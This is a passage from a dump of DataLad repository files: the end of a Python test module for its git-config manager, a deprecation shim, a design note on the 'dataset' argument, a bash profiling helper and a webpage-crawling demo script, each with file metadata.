2)\n # raises with force=False\n assert_raises(CommandError,\n cfg.set, 'mike.should.have', 'a beer', force=False)\n assert_equal(len(cfg['mike.should.have']), 2)\n # replaces all matching ones with force=True\n cfg.set('mike.should.have', 'a beer', force=True)\n assert_equal(cfg['mike.should.have'], 'a beer')\n\n # test deprecated 'where' interface and old 'dataset' (not 'branch') value\n # TODO: remove along with the removal of deprecated 'where'\n cfg.set('mike.should.have', 'wasknown', where='dataset')\n assert_equal(cfg['mike.should.have'], 'wasknown')\n assert_equal(cfg.get_from_source('dataset', 'mike.should.have'), 'wasknown')\n\n # fails unknown location\n assert_raises(ValueError, cfg.add, 'somesuch', 'shit', scope='umpalumpa')\n\n # very carefully test non-local config\n # so carefully that even in case of bad weather Yarik doesn't find some\n # lame datalad unittest sections in his precious ~/.gitconfig\n\n # Note: An easier way to test this, would be to just set GIT_CONFIG_GLOBAL\n # to point somewhere else. 
However, this is not supported by git before\n # 2.32. Hence, stick with changed HOME in this test, but be sure to unset a\n # possible GIT_CONFIG_GLOBAL in addition.\n\n patched_env = os.environ.copy()\n patched_env.pop('GIT_CONFIG_GLOBAL', None)\n patched_env.update(get_home_envvars(new_home))\n with patch.dict('os.environ',\n dict(patched_env, DATALAD_SNEAKY_ADDITION='ignore'),\n clear=True):\n global_gitconfig = opj(new_home, '.gitconfig')\n assert(not exists(global_gitconfig))\n globalcfg = ConfigManager()\n assert_not_in('datalad.unittest.youcan', globalcfg)\n assert_in('datalad.sneaky.addition', globalcfg)\n cfg.add('datalad.unittest.youcan', 'removeme', scope='global')\n assert(exists(global_gitconfig))\n # it did not go into the dataset's config!\n assert_not_in('datalad.unittest.youcan', cfg)\n # does not monitor additions!\n globalcfg.reload(force=True)\n assert_in('datalad.unittest.youcan', globalcfg)\n with swallow_logs():\n assert_raises(\n CommandError,\n globalcfg.unset,\n 'datalad.unittest.youcan',\n scope='local')\n assert(globalcfg.has_section('datalad.unittest'))\n globalcfg.unset('datalad.unittest.youcan', scope='global')\n # but after we unset the only value -- that section is no longer listed\n assert (not globalcfg.has_section('datalad.unittest'))\n assert_not_in('datalad.unittest.youcan', globalcfg)\n ok_file_has_content(global_gitconfig, \"\")\n\n cfg = ConfigManager(\n Dataset(opj(path, 'ds')),\n source='branch',\n overrides={'datalad.godgiven': True})\n assert_equal(cfg.get('datalad.godgiven'), True)\n # setter has no effect\n cfg.set('datalad.godgiven', 'false')\n assert_equal(cfg.get('datalad.godgiven'), True)\n\n\n@with_tree(tree={\n '.gitconfig': \"\"\"\\\n[includeIf \"gitdir:**/devbgc/**\"]\n path = ~/.gitconfig_bgc\n\n[custom \"datalad\"]\n variable = value\n\"\"\"})\ndef test_includeif_breaking(new_home=None):\n patched_env = os.environ.copy()\n patched_env.pop('GIT_CONFIG_GLOBAL', None)\n patched_env.update(get_home_envvars(new_home))\n with patch.dict('os.environ', patched_env, clear=True):\n cfg = ConfigManager()\n # just want to make sure we read it and didn't crash\n assert cfg.get('custom.datalad.variable') == \"value\"\n\n\n@with_tree(tree={\n 'ds': {\n '.datalad': {\n 'config': \"\"\"\\\n[crazy]\n fa = !git remote | xargs -r -I REMOTE /bin/bash -c 'echo I: Fetching from REMOTE && git fetch --prune REMOTE && git fetch -t REMOTE' && [ -d .git/svn ] && bash -c 'echo I: Fetching from SVN && git svn fetch' || : && [ -e .gitmodules ] && bash -c 'echo I: Fetching submodules && git submodule foreach git fa' && [ -d .git/sd ] && bash -c 'echo I: Fetching bugs into sd && git-sd pull --all' || :\n pa = !git paremotes | tr ' ' '\\\\n' | xargs -r -l1 git push\n pt = !git testremotes | tr ' ' '\\\\n' | xargs -r -l1 -I R git push -f R master\n ptdry = !git testremotes | tr ' ' '\\\\n' | xargs -r -l1 -I R git push -f --dry-run R master\n padry = !git paremotes | tr ' ' '\\\\n' | xargs -r -l1 git push --dry-run\n\"\"\"}}})\ndef test_crazy_cfg(path=None):\n cfg = ConfigManager(GitRepo(opj(path, 'ds'), create=True), source='branch')\n assert_in('crazy.padry', cfg)\n # make sure crazy config is not read when in local mode\n cfg = ConfigManager(Dataset(opj(path, 'ds')), source='local')\n assert_not_in('crazy.padry', cfg)\n # it will make it in in 'any' mode though\n cfg = ConfigManager(Dataset(opj(path, 'ds')), source='any')\n assert_in('crazy.padry', cfg)\n # typos in the source mode arg will not have silent side-effects\n assert_raises(\n ValueError, ConfigManager, 
Dataset(opj(path, 'ds')), source='locale')\n\n\n@with_tempfile\ndef test_obtain(path=None):\n ds = create(path)\n cfg = ConfigManager(ds)\n dummy = 'datalad.test.dummy'\n # we know nothing and we don't know how to ask\n assert_raises(RuntimeError, cfg.obtain, dummy)\n # can report known ones\n cfg.add(dummy, '5.3')\n assert_equal(cfg.obtain(dummy), '5.3')\n # better type\n assert_equal(cfg.obtain(dummy, valtype=float), 5.3)\n # don't hide type issues, float doesn't become an int magically\n assert_raises(ValueError, cfg.obtain, dummy, valtype=int)\n # inject some prior knowledge\n from datalad.interface.common_cfg import definitions as cfg_defs\n cfg_defs[dummy] = dict(type=float)\n # no we don't need to specify a type anymore\n assert_equal(cfg.obtain(dummy), 5.3)\n # but if we remove the value from the config, all magic is gone\n cfg.unset(dummy)\n # we know nothing and we don't know how to ask\n assert_raises(RuntimeError, cfg.obtain, dummy)\n\n #\n # test actual interaction\n #\n @with_testsui()\n def ask():\n # fail on unknown dialog type\n assert_raises(ValueError, cfg.obtain, dummy, dialog_type='Rorschach_test')\n ask()\n\n # ask nicely, and get a value of proper type using the preconfiguration\n @with_testsui(responses='5.3')\n def ask():\n assert_equal(\n cfg.obtain(dummy, dialog_type='question', text='Tell me'), 5.3)\n ask()\n\n # preconfigure even more, to get the most compact call\n cfg_defs[dummy]['ui'] = ('question', dict(text='tell me', title='Gretchen Frage'))\n\n @with_testsui(responses='5.3')\n def ask():\n assert_equal(cfg.obtain(dummy), 5.3)\n ask()\n\n @with_testsui(responses='murks')\n def ask():\n assert_raises(ValueError, cfg.obtain, dummy)\n ask()\n\n # fail to store when destination is not specified, will not even ask\n @with_testsui()\n def ask():\n assert_raises(ValueError, cfg.obtain, dummy, store=True)\n ask()\n\n # but we can preconfigure it\n cfg_defs[dummy]['destination'] = 'broken'\n\n @with_testsui(responses='5.3')\n def ask():\n assert_raises(ValueError, cfg.obtain, dummy, store=True)\n ask()\n\n # fixup destination\n cfg_defs[dummy]['destination'] = 'branch'\n\n @with_testsui(responses='5.3')\n def ask():\n assert_equal(cfg.obtain(dummy, store=True), 5.3)\n ask()\n\n # now it won't have to ask again\n @with_testsui()\n def ask():\n assert_equal(cfg.obtain(dummy), 5.3)\n ask()\n\n # wipe it out again\n cfg.unset(dummy)\n assert_not_in(dummy, cfg)\n\n # XXX cannot figure out how I can simulate a simple <Enter>\n ## respond with accepting the default\n #@with_testsui(responses=...)\n #def ask():\n # assert_equal(cfg.obtain(dummy, default=5.3), 5.3)\n #ask()\n\n\ndef test_from_env():\n cfg = ConfigManager()\n assert_not_in('datalad.crazy.cfg', cfg)\n with patch.dict('os.environ',\n {'DATALAD_CRAZY_CFG': 'impossibletoguess'}):\n cfg.reload()\n assert_in('datalad.crazy.cfg', cfg)\n assert_equal(cfg['datalad.crazy.cfg'], 'impossibletoguess')\n # not in dataset-only mode\n cfg = ConfigManager(Dataset('nowhere'), source='branch')\n assert_not_in('datalad.crazy.cfg', cfg)\n # check env trumps override\n cfg = ConfigManager()\n assert_not_in('datalad.crazy.override', cfg)\n cfg.set('datalad.crazy.override', 'fromoverride', scope='override')\n cfg.reload()\n assert_equal(cfg['datalad.crazy.override'], 'fromoverride')\n with patch.dict('os.environ',\n {'DATALAD_CRAZY_OVERRIDE': 'fromenv'}):\n cfg.reload()\n assert_equal(cfg['datalad.crazy.override'], 'fromenv')\n\n\ndef test_from_env_overrides():\n cfg = ConfigManager()\n assert_not_in(\"datalad.FoO\", cfg)\n\n # 
Some details, like case and underscores, cannot be handled by the direct\n # environment variable mapping.\n with patch.dict(\"os.environ\",\n {\"DATALAD_FOO\": \"val\"}):\n cfg.reload()\n assert_not_in(\"datalad.FoO\", cfg)\n assert_equal(cfg[\"datalad.foo\"], \"val\")\n\n # But they can be handled via DATALAD_CONFIG_OVERRIDES_JSON.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{\"datalad.FoO\": \"val\"}'}):\n cfg.reload()\n assert_equal(cfg[\"datalad.FoO\"], \"val\")\n\n # DATALAD_CONFIG_OVERRIDES_JSON isn't limited to datalad variables.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{\"a.b.c\": \"val\"}'}):\n cfg.reload()\n assert_equal(cfg[\"a.b.c\"], \"val\")\n\n # Explicitly provided DATALAD_ variables take precedence over those in\n # DATALAD_CONFIG_OVERRIDES_JSON.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{\"datalad.foo\": \"val\"}',\n \"DATALAD_FOO\": \"val-direct\"}):\n cfg.reload()\n assert_equal(cfg[\"datalad.foo\"], \"val-direct\")\n\n # JSON decode errors don't lead to crash.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{'}):\n with swallow_logs(logging.WARNING) as cml:\n cfg.reload()\n assert_in(\"Failed to load DATALAD_CONFIG_OVERRIDE\", cml.out)\n\n\ndef test_overrides():\n cfg = ConfigManager()\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', cfg)\n # set\n cfg.set('user.name', 'myoverride', scope='override')\n assert_equal(cfg['user.name'], 'myoverride')\n # unset just removes override, not entire config\n cfg.unset('user.name', scope='override')\n assert_in('user.name', cfg)\n assert_not_equal('user.name', 'myoverride')\n # add\n # there is no initial increment\n cfg.add('user.name', 'myoverride', scope='override')\n assert_equal(cfg['user.name'], 'myoverride')\n # same as with add, not a list\n assert_equal(cfg['user.name'], 'myoverride')\n # but then there is\n cfg.add('user.name', 'myother', scope='override')\n assert_equal(cfg['user.name'], ['myoverride', 'myother'])\n # rename\n assert_not_in('ups.name', cfg)\n cfg.rename_section('user', 'ups', scope='override')\n # original variable still there\n assert_in('user.name', cfg)\n # rename of override in effect\n assert_equal(cfg['ups.name'], ['myoverride', 'myother'])\n # remove entirely by section\n cfg.remove_section('ups', scope='override')\n from datalad.utils import Path\n assert_not_in(\n 'ups.name', cfg,\n (cfg._stores,\n cfg.overrides,\n ))\n\n\ndef test_rewrite_url():\n test_cases = (\n # no match\n ('unicorn', 'unicorn'),\n # custom label replacement\n ('example:datalad/datalad.git', '[email protected]:datalad/datalad.git'),\n # protocol enforcement\n ('git://example.com/some', 'https://example.com/some'),\n # multi-match\n ('mylabel', 'ria+ssh://fully.qualified.com'),\n ('myotherlabel', 'ria+ssh://fully.qualified.com'),\n # conflicts, same label pointing to different URLs\n ('conflict', 'conflict'),\n # also conflicts, but hidden in a multi-value definition\n ('conflict2', 'conflict2'),\n )\n cfg_in = {\n # label rewrite\n '[email protected]:': 'example:',\n # protocol change\n 'https://example': 'git://example',\n # multi-value\n 'ria+ssh://fully.qualified.com': ('mylabel', 'myotherlabel'),\n # conflicting definitions\n 'http://host1': 'conflict',\n 'http://host2': 'conflict',\n # hidden conflict\n 'http://host3': 'conflict2',\n 'http://host4': ('someokish', 'conflict2'),\n }\n cfg = {\n 'url.{}.insteadof'.format(k): v\n for k, v in cfg_in.items()\n 
}\n for input, output in test_cases:\n with swallow_logs(logging.WARNING) as msg:\n assert_equal(rewrite_url(cfg, input), output)\n if input.startswith('conflict'):\n assert_in(\"Ignoring URL rewrite\", msg.out)\n\n\n# https://github.com/datalad/datalad/issues/4071\n@with_tempfile()\n@with_tempfile()\ndef test_no_leaks(path1=None, path2=None):\n ds1 = Dataset(path1).create()\n ds1.config.set('i.was.here', 'today', scope='local')\n assert_in('i.was.here', ds1.config.keys())\n ds1.config.reload()\n assert_in('i.was.here', ds1.config.keys())\n # now we move into this one repo, and create another\n # make sure that no config from ds1 leaks into ds2\n with chpwd(path1):\n ds2 = Dataset(path2)\n assert_not_in('i.was.here', ds2.config.keys())\n ds2.config.reload()\n assert_not_in('i.was.here', ds2.config.keys())\n\n ds2.create()\n assert_not_in('i.was.here', ds2.config.keys())\n\n # and that we do not track the wrong files\n assert_not_in(ds1.pathobj / '.git' / 'config',\n ds2.config._stores['git']['files'])\n assert_not_in(ds1.pathobj / '.datalad' / 'config',\n ds2.config._stores['branch']['files'])\n # these are the right ones\n assert_in(ds2.pathobj / '.git' / 'config',\n ds2.config._stores['git']['files'])\n assert_in(ds2.pathobj / '.datalad' / 'config',\n ds2.config._stores['branch']['files'])\n\n\n@with_tempfile()\ndef test_no_local_write_if_no_dataset(path=None):\n Dataset(path).create()\n with chpwd(path):\n cfg = ConfigManager()\n with assert_raises(CommandError):\n cfg.set('a.b.c', 'd', scope='local')\n\n\n@with_tempfile\ndef test_dataset_local_mode(path=None):\n ds = create(path)\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', ds.config)\n # from .datalad/config\n assert_in('datalad.dataset.id', ds.config)\n # from .git/config\n assert_in('annex.version', ds.config)\n # now check that dataset-local mode doesn't have the global piece\n cfg = ConfigManager(ds, source='branch-local')\n assert_not_in('user.name', cfg)\n assert_in('datalad.dataset.id', cfg)\n assert_in('annex.version', cfg)\n\n\n# https://github.com/datalad/datalad/issues/4071\n@with_tempfile\ndef test_dataset_systemglobal_mode(path=None):\n ds = create(path)\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', ds.config)\n # from .datalad/config\n assert_in('datalad.dataset.id', ds.config)\n # from .git/config\n assert_in('annex.version', ds.config)\n with chpwd(path):\n # now check that no config from a random dataset at PWD is picked up\n # if not dataset instance was provided\n cfg = ConfigManager(dataset=None, source='any')\n assert_in('user.name', cfg)\n assert_not_in('datalad.dataset.id', cfg)\n assert_not_in('annex.version', cfg)\n\n\ndef test_global_config():\n\n # from within tests, global config should be read from faked $HOME (see\n # setup_package) or from GIT_CONFIG_GLOBAL\n\n if 'GIT_CONFIG_GLOBAL' in os.environ.keys():\n glb_cfg_file = Path(os.environ.get('GIT_CONFIG_GLOBAL'))\n else:\n glb_cfg_file = Path(os.path.expanduser('~')) / '.gitconfig'\n assert any(glb_cfg_file.samefile(Path(p)) for p in dl_cfg._stores['git']['files'])\n assert_equal(dl_cfg.get(\"user.name\"), \"DataLad Tester\")\n assert_equal(dl_cfg.get(\"user.email\"), \"[email protected]\")\n\n\[email protected](r\"ignore: status\\(report_filetype=\\) no longer supported\")\n@with_tempfile()\n@with_tempfile()\ndef test_bare(src=None, path=None):\n # create a proper datalad dataset with all bells and whistles\n ds = Dataset(src).create()\n dlconfig_sha = 
ds.repo.call_git(['rev-parse', 'HEAD:.datalad/config']).strip()\n # can we handle a bare repo version of it?\n gr = AnnexRepo.clone(\n src, path, clone_options=['--bare', '-b', DEFAULT_BRANCH])\n # we had to specifically checkout the standard branch, because on crippled\n # FS, HEAD will point to an adjusted branch by default, and the test logic\n # below does not account for this case.\n # this should just make sure the bare repo has the expected setup,\n # but it should still be bare. Let's check that to be sure\n assert_true(gr.bare)\n # do we read the correct local config?\n assert_in(gr.pathobj / 'config', gr.config._stores['git']['files'])\n # do we pick up the default branch config too?\n assert_in('blob:HEAD:.datalad/config',\n gr.config._stores['branch']['files'])\n # and track its reload stamp via its file shasum\n assert_equal(\n dlconfig_sha,\n gr.config._stores['branch']['stats']['blob:HEAD:.datalad/config'])\n # check that we can pick up the dsid from the commit branch config\n assert_equal(ds.id, gr.config.get('datalad.dataset.id'))\n # and it is coming from the correct source\n assert_equal(\n ds.id,\n gr.config.get_from_source('branch', 'datalad.dataset.id'))\n assert_equal(\n None,\n gr.config.get_from_source('local', 'datalad.dataset.id'))\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', gr.config)\n # not set something that wasn't there\n obscure_key = 'sec.reallyobscurename!@@.key'\n assert_not_in(obscure_key, gr.config)\n # to the local config, which is easily accessible\n gr.config.set(obscure_key, 'myvalue', scope='local')\n assert_equal(gr.config.get(obscure_key), 'myvalue')\n # now make sure the config is where we think it is\n assert_in(obscure_key.split('.')[1], (gr.pathobj / 'config').read_text())\n # update committed config and check update\n old_id = ds.id\n ds.config.set('datalad.dataset.id', 'surprise!', scope='branch')\n ds.save()\n # fetch into default branch (like `update`, but for bare-repos)\n gr.call_git([\n 'fetch', f'{DEFAULT_REMOTE}', f'{DEFAULT_BRANCH}:{DEFAULT_BRANCH}'])\n # without a reload, no state change, like with non-bare repos\n assert_equal(\n old_id,\n gr.config.get_from_source('branch', 'datalad.dataset.id'))\n # a non-forced reload() must be enough, because state change\n # detection kicks in\n gr.config.reload()\n assert_equal('surprise!', gr.config.get('datalad.dataset.id'))\n\n\n@with_tempfile()\ndef test_write_config_section(path=None):\n # can we handle a bare repo?\n gr = GitRepo(path, create=True, bare=True)\n\n obscure = \"ds-; &%b5{}# some % \"\n # test cases\n # first 3 args are write_config_section() parameters\n # 4th arg is a list with key/value pairs that should end up in a\n # ConfigManager after a reload\n testcfg = [\n ('submodule', 'sub', dict(active='true', url='http://example.com'), [\n ('submodule.sub.active', 'true'),\n ('submodule.sub.url', 'http://example.com'),\n ]),\n ('submodule', 'sub\"quote', {\"a-b\": '\"quoted\"', 'c': 'with\"quote'}, [\n ('submodule.sub\"quote.a-b', '\"quoted\"'),\n ('submodule.sub\"quote.c', 'with\"quote'),\n ]),\n ('short', ' s p a c e ', {\"a123\": ' space all over '}, [\n ('short. 
s p a c e .a123', ' space all over '),\n ]),\n ('submodule', obscure, {\n 'path': obscure,\n 'url': f\"./{obscure}\"}, [\n (f\"submodule.{obscure}.path\", obscure),\n (f\"submodule.{obscure}.url\", f\"./{obscure}\"),\n ]),\n ]\n\n for tc in testcfg:\n # using append mode to provoke potential interference by\n # successive calls\n with (gr.pathobj / 'config').open('a') as fobj:\n write_config_section(fobj, tc[0], tc[1], tc[2])\n gr.config.reload()\n for testcase in tc[3]:\n assert_in(testcase[0], gr.config)\n assert_equal(testcase[1], gr.config[testcase[0]])\n\n\n@with_tempfile()\ndef test_external_modification(path=None):\n from datalad.cmd import WitlessRunner as Runner\n runner = Runner(cwd=path)\n repo = GitRepo(path, create=True)\n config = repo.config\n\n key = 'sec.sub.key'\n assert_not_in(key, config)\n config.set(key, '1', scope='local')\n assert_equal(config[key], '1')\n\n # we pick up the case where we modified so size changed\n runner.run(['git', 'config', '--local', '--replace-all', key, '10'])\n # unfortunately we do not react for .get unless reload. But here\n # we will test if reload is correctly decides to reload without force\n config.reload()\n assert_equal(config[key], '10')\n\n # and no size change\n runner.run(['git', 'config', '--local', '--replace-all', key, '11'])\n config.reload()\n assert_equal(config[key], '11')\n\n\n# TODO: remove test along with the removal of deprecated 'where'\[email protected](\"ignore: 'where' is deprecated\")\[email protected](\"ignore: 'where=\\\"dataset\\\"' is deprecated\")\ndef test_where_to_scope():\n\n @_where_to_scope\n def f(scope=None):\n return scope\n\n # others aren't affected but we map where to scope\n assert_equal(f(where='local'), 'local')\n assert_equal(f(scope='local'), 'local')\n # we do mapping to 'branch' for where\n assert_equal(f(where='dataset'), 'branch')\n # but not for 'scope' -- since that is the target new name, we pass as is\n assert_equal(f(scope='dataset'), 'dataset')\n # we do not allow both\n assert_raises(ValueError, f, where='local', scope='local')\n\n\ndef test_cross_cfgman_update(tmp_path):\n myuniqcfg = 'datalad.tester.unique.updatecfg'\n myuniqcfg_value = 'some'\n myuniqcfg_value2 = 'someother'\n assert myuniqcfg not in dl_cfg\n ds = Dataset(tmp_path)\n assert not ds.is_installed()\n # there is no dataset to write to, it rejects it rightfully\n # it is a bit versatile in its exception behavior\n # https://github.com/datalad/datalad/issues/7300\n with pytest.raises((ValueError, CommandError)):\n ds.config.set(myuniqcfg, myuniqcfg_value, scope='local')\n # but we can write to global scope\n ds.config.set(myuniqcfg, myuniqcfg_value, scope='global')\n # it can retrieve the update immediately, because set(reload=)\n # defaults to True\n assert ds.config.get(myuniqcfg) == myuniqcfg_value\n # given that we modified the global scope, we expect this to\n # be reflected in the global cfgman too\n assert dl_cfg.get(myuniqcfg) == myuniqcfg_value\n\n # now we create a repo\n ds.create(result_renderer='disabled')\n # we had written to global scope, we expect the probe item\n # to stick around, even though the cfgman instance is replaced\n assert ds.config.get(myuniqcfg) == myuniqcfg_value\n # now we replace the value via this new cfgman\n ds.config.set(myuniqcfg, myuniqcfg_value2, scope='global')\n # and again expect the global instance to catch up with it\n assert dl_cfg.get(myuniqcfg) == myuniqcfg_value2\n" }, { "alpha_fraction": 0.7426470518112183, "alphanum_fraction": 0.7426470518112183, "avg_line_length": 
29.22222137451172, "blob_id": "2165d2802567eef9d322908a7d9be6c6022af40b", "content_id": "4e0100caefcdb79b86ea0ea69dea042befced938", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 272, "license_type": "permissive", "max_line_length": 79, "num_lines": 9, "path": "/datalad/plugin/check_dates.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.check_dates is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.check_dates instead.\",\n DeprecationWarning)\n\nfrom datalad.local.check_dates import *\n" }, { "alpha_fraction": 0.7219662070274353, "alphanum_fraction": 0.7238863110542297, "avg_line_length": 38.45454406738281, "blob_id": "10e9897e219c0a1560c8e7a12b5e28e1aef50b71", "content_id": "b9bbfc9c881e7d634052c1e1fe47480eb85326d2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2604, "license_type": "permissive", "max_line_length": 150, "num_lines": 66, "path": "/docs/source/design/dataset_argument.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_dataset_argument:\n\n********************\n``dataset`` argument\n********************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nAll commands which operate on datasets have a ``dataset`` argument (``-d`` or\n``--dataset`` for the :term:`CLI`) to identify a single dataset as the\ncontext of an operation.\nIf ``--dataset`` argument is not provided, the context of an operation is command-specific.\nFor example, `clone` command will consider the :term:`dataset` which is being cloned to be the context.\nBut typically, a dataset which current working directory belongs to is the context of an operation.\nIn the latter case, if operation (e.g., `get`) does not find a dataset in current working directory, operation fails with an ``NoDatasetFound`` error.\n\n\nImpact on relative path resolution\n==================================\n\nWith one exception, the nature of a provided ``dataset`` argument does **not**\nimpact the interpretation of relative paths. Relative paths are always considered\nto be relative to the process working directory.\n\nThe one exception to this rule is passing a ``Dataset`` object instance as\n``dataset`` argument value in the Python API. In this, and only this, case, a\nrelative path is interpreted as relative to the root of the respective dataset.\n\n\nSpecial values\n==============\n\nThere are some pre-defined \"shortcut\" values for dataset arguments:\n\n``^``\n Represents to the topmost superdataset that contains the dataset the current\n directory is part of.\n``^.``\n Represents the root directory of the dataset the current directory is part of.\n``///``\n Represents the \"default\" dataset located under `$HOME/datalad/`.\n\n\nUse cases\n=========\n\nSave modification in superdataset hierarchy\n-------------------------------------------\n\nSometimes it is convenient to work only in the context of a subdataset.\nExecuting a ``datalad save <subdataset content>`` will record changes to the\nsubdataset, but will leave existing superdatasets dirty, as the subdataset\nstate change will not be saved there. 
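A rough Python-API counterpart of this situation (a sketch only; the paths and file name are hypothetical, while ``Dataset`` and ``save`` are the interfaces described above)::

    from datalad.distribution.dataset import Dataset

    sub = Dataset('/tmp/super/sub')       # hypothetical subdataset location
    # records the change in the subdataset only; the containing
    # superdataset at /tmp/super still shows a modified submodule state
    sub.save(path='notes.txt', message='update notes')
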
Using the ``dataset`` argument it is\npossible to redefine the scope of the save operation. For example::\n\n datalad save -d^ <subdataset content>\n\nwill perform the exact same save operation in the subdataset, but additionally\nsave all subdataset state changes in all superdatasets until the root of a\ndataset hierarchy. Except for the specification of the dataset scope there is\nno need to adjust path arguments or change the working directory.\n" }, { "alpha_fraction": 0.6087902784347534, "alphanum_fraction": 0.6166231632232666, "avg_line_length": 21.320388793945312, "blob_id": "837948888a79058970a90d56642f84f8f8a26b2e", "content_id": "0ac19d1abd48b320f7f9f95d9d2bcc60b91d4716", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2298, "license_type": "permissive", "max_line_length": 122, "num_lines": 103, "path": "/tools/profile_python", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# A little helper to profile Python scripts and directly python code\n#\n#\n\nset -ue\n\nmktemp_() {\n mktemp \"${TMPDIR:-/tmp}/profile_pythonXXXXXX\"\n}\n\nhelp() {\n cat << EOF\nHelper to create profile graphs for Python scripts and code (via -c argument)\n\n$0 [--help] [--copyq] [-p|--prefix PREFIX] [-c \"python code\"|script] [ARGS]\n\nIf copyq is available, will also copy to its clipboard while you are enjoying\nthe view.\n\nIf script file is not found, will try to locate it in the PATH, and proceed with\nit if found.\nEOF\n exit 0\n}\n\n[ \"$#\" = 0 ] && help\n\nprefix=\ncopyq=\n\nwhile [[ \"$#\" -gt 0 ]]; do case \"$1\" in\n -h|--help)\n help;;\n -c)\n echo \"We are passed Python statement to profile.\"\n shift\n prefix=$(mktemp_)\n pyfile=\"$prefix.py\"\n echo \"$1\" >| \"$pyfile\"\n shift\n #echo \"Temporary script $pyfile will be removed after\"\n #trap \"rm -f ${prefix}*\" 0\n break\n ;;\n -p|--prefix)\n shift\n prefix=\"$1\"\n echo \"Prefix $prefix\"\n shift\n ;;\n --copyq)\n shift\n hash copyq 2>/dev/null || { echo \"No copyq found\"; exit 1; }\n copyq=yes\n ;;\n *) # must be a script\n pyfile=\"$1\"\n shift\n break\n ;;\nesac; done\n\n\nif [ -z \"$prefix\" ]; then\n prefix=$(mktemp_ profile_pythonXXXXXX)\nfi\n\npstatsfile=\"$prefix.pstats\"\npngfile=\"$prefix.png\"\nstatsfile=\"$prefix.stats\"\n\nif [ ! -e \"$pyfile\" ]; then\n echo \"File $pyfile is not found. Is it a script in the PATH?\"\n pyfile_=$(command -v \"$pyfile\" 2>/dev/null)\n if [ -n \"$pyfile_\" ]; then\n echo \" Found $pyfile_ which we will use instead\"\n pyfile=\"$pyfile_\"\n else\n echo \" No file found. 
Exiting\"\n exit 1\n fi\nfi\n\necho \"Profiling $pyfile\"\npython -m cProfile -s name -o \"$pstatsfile\" \"$pyfile\" \"$@\" || echo \"E: Exited with $?\"\ngprof2dot -f pstats \"$pstatsfile\" | dot -Tpng -o \"$pngfile\"\n\necho \"Stats file $statsfile\"\npython -c \"import pstats; pstats.Stats('$pstatsfile').sort_stats(pstats.SortKey.CUMULATIVE).print_stats()\" >| \"$statsfile\"\nhead -n 20 \"$statsfile\"\n\necho \"Showing $pngfile\"\nxdg-open \"$pngfile\" &\n\nif [ -n \"$copyq\" ]; then\n echo \"Copying $statsfile to CopyQ clipboard\"\n copyq write text/plain - < \"$statsfile\" && copyq select 0\n\n echo \"Copying $pngfile to CopyQ clipboard\"\n copyq write image/png - < \"$pngfile\" && copyq select 0\nfi" }, { "alpha_fraction": 0.7653471231460571, "alphanum_fraction": 0.7670682668685913, "avg_line_length": 61.25, "blob_id": "1dccc8a6186cf39815130a078931215cfb4b4f4f", "content_id": "57bf6d7adcf575133dd089762acaa6c0390b5b8b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1743, "license_type": "permissive", "max_line_length": 256, "num_lines": 28, "path": "/docs/casts/track_data_from_webpage.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"With a few lines DataLad is set up to track data posted on a website, and obtain changes made in the future...\"\n\nsay \"The website http://www.fmri-data-analysis.org/code provides code and data file for examples in a text book.\"\nsay \"We will set up a dataset that DataLad uses to track the content linked from this webpage\"\nsay \"Let's create the dataset, and configure it to track any text file directly in Git. This will make it very convenient to see how source code changed over time.\"\nrun \"datalad create --text-no-annex demo\"\nrun \"cd demo\"\n\nsay \"DataLad's crawler functionality is used to monitor the webpage. It's configuration is stored in the dataset itself.\"\nsay \"The crawler comes with a bunch of configuration templates. Here we are using one that extract all URLs that match a particular pattern, and obtains the linked data. In case of this webpage, all URLs of interest on that page seems to have 'd=1' suffix\"\nrun \"datalad crawl-init --save --template=simple_with_archives url=http://www.fmri-data-analysis.org/code 'a_href_match_=.*d=1$'\"\nrun \"datalad diff --revision @~1\"\nrun \"cat .datalad/crawl/crawl.cfg\"\n\nsay \"With this configuration in place, we can ask DataLad to crawl the webpage.\"\nrun \"datalad crawl\"\n\nsay \"All files have been obtained and are ready to use. Here is what DataLad recorded for this update\"\nrun \"git show @ -s\"\n\nsay \"Any file from the webpage is available locally.\"\nrun \"ls\"\n\nsay \"The webpage can be queried for potential updates at any time by re-running the 'crawl' command.\"\nrun \"datalad crawl\"\n\nsay \"Files can be added, or removed from this dataset without impairing the ability to get updates from the webpage. 
